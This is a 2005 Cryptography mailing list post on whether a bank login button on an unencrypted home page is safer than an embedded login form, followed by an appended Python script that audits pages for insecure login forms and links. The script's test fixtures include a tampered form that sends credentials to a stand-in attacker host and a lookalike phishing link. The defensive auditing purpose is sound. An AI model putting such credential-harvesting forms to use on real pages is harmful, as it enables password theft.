AmEx unprotected login site

Ben Laurie ben at algroup.co.uk
Thu Jun 9 08:40:08 EDT 2005


Perry E. Metzger wrote:
> "Steven M. Bellovin" <smb at cs.columbia.edu> writes:
> 
>>>They're still doing the wrong thing. Unless the page was transmitted
>>>to you securely, you have no way to trust that your username and
>>>password are going to them and not to someone who cleverly sent you an
>>>altered version of the page.
>>
>>They're doing the wrong thing, and probably feel they have no choice.  
>>Setting up an SSL session is expensive; most people who go to their 
>>home page do not log in, and hence do not (to Amex) require 
>>cryptographic protection.
> 
> 
> That's why Citibank and most well run bank sites have you click on a
> button on the front page to go to the login screen. There are ways to
> handle this correctly.

Why is this better? The button you click can just as easily take you to 
a site other than the one intended.

-- 
 >>>ApacheCon Europe<<<                   http://www.apachecon.com/

http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff
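The exchange above turns on two separate trust problems: a password form embedded in an unprotected page can be altered to post anywhere, and a "log in" button on an unprotected page can just as easily be altered to point anywhere. The following is an added example, not code from the thread or from any of the sites named in it; it audits a fetched page for both conditions using only the Python standard library. The hostnames and HTML snippets are constructed for the example, and the rule that a login form or link must stay on the page's own host (or a caller-supplied trusted set) is an assumption of the example, since real sites often use a separate login host.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class LoginPageAuditor(HTMLParser):
    """Collects form actions (with whether they carry a password field)
    and anchor targets with their visible text from one HTML document."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []   # dicts: {"action": absolute URL, "password": bool}
        self.links = []   # dicts: {"href": absolute URL, "text": visible text}
        self._form = None
        self._link = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # Relative actions resolve against the page URL, as a browser would.
            self._form = {"action": urljoin(self.page_url, a.get("action", "")),
                          "password": False}
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["password"] = True
        elif tag == "a" and a.get("href"):
            self._link = {"href": urljoin(self.page_url, a["href"]), "text": ""}

    def handle_data(self, data):
        if self._link is not None:
            self._link["text"] += data

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None
        elif tag == "a" and self._link is not None:
            self.links.append(self._link)
            self._link = None


LOGIN_WORDS = ("log in", "login", "sign in", "sign on")


def audit_login_page(page_url, html, trusted_hosts=None):
    """Return a list of findings (strings); an empty list means no issue found.

    The first check is the decisive one: if the page itself arrived over plain
    HTTP, nothing parsed out of it (form targets, button links) can be trusted,
    so the remaining checks only describe what an unmodified copy would do."""
    findings = []
    page = urlparse(page_url)
    trusted = set(trusted_hosts or ()) | {page.hostname}
    if page.scheme != "https":
        findings.append("page served over plain HTTP: its form targets and links are untrustworthy")

    p = LoginPageAuditor(page_url)
    p.feed(html)

    for f in p.forms:
        if not f["password"]:
            continue
        target = urlparse(f["action"])
        if target.scheme != "https":
            findings.append("password form posts over plain HTTP to %s" % f["action"])
        if target.hostname not in trusted:
            findings.append("password form posts to an untrusted host: %s" % target.hostname)

    for link in p.links:
        text = link["text"].strip()
        if any(w in text.lower() for w in LOGIN_WORDS):
            target = urlparse(link["href"])
            if target.scheme != "https" or target.hostname not in trusted:
                findings.append("login link '%s' points to %s" % (text, link["href"]))
    return findings


# Constructed sample pages for demonstration (hostnames are fictitious).
HTTP_PAGE = "http://www.example-bank.test/"
HTTPS_PAGE = "https://www.example-bank.test/"

# Bellovin's scenario: password form on an unprotected home page, posting to HTTPS.
FORM_ON_HTTP = ('<form action="https://www.example-bank.test/login" method="post">'
                '<input type="text" name="user"><input type="password" name="pass"></form>')
# The same page as an attacker could deliver it: form re-pointed elsewhere.
ALTERED_FORM = ('<form action="http://collector.attacker.test/steal" method="post">'
                '<input type="text" name="user"><input type="password" name="pass"></form>')
# Metzger's scenario: a button on the front page leading to the login screen.
BUTTON_ON_HTTP = '<a href="https://www.example-bank.test/login">Log in</a>'
# Laurie's objection: the button can just as easily point somewhere else.
ALTERED_BUTTON = '<a href="https://www.example-bank.test.attacker.test/login">Log in</a>'
# A page that passes: served over HTTPS, form and button stay on the same host.
CLEAN_PAGE = ('<form action="/login" method="post"><input type="password" name="pass"></form>'
              '<a href="/login">Sign in</a>')

if __name__ == "__main__":
    for name, url, html in [("form on HTTP", HTTP_PAGE, FORM_ON_HTTP),
                            ("altered form", HTTP_PAGE, ALTERED_FORM),
                            ("button on HTTP", HTTP_PAGE, BUTTON_ON_HTTP),
                            ("altered button", HTTP_PAGE, ALTERED_BUTTON),
                            ("clean page", HTTPS_PAGE, CLEAN_PAGE)]:
        print(name, audit_login_page(url, html) or ["ok"])
```

Note that the "button on HTTP" and "form on HTTP" cases produce the same single finding: once the page is unprotected, whether credentials are typed into it or reached through a link from it makes no difference to what an auditor can conclude, which is the point of the reply above.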

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo at metzdowd.com


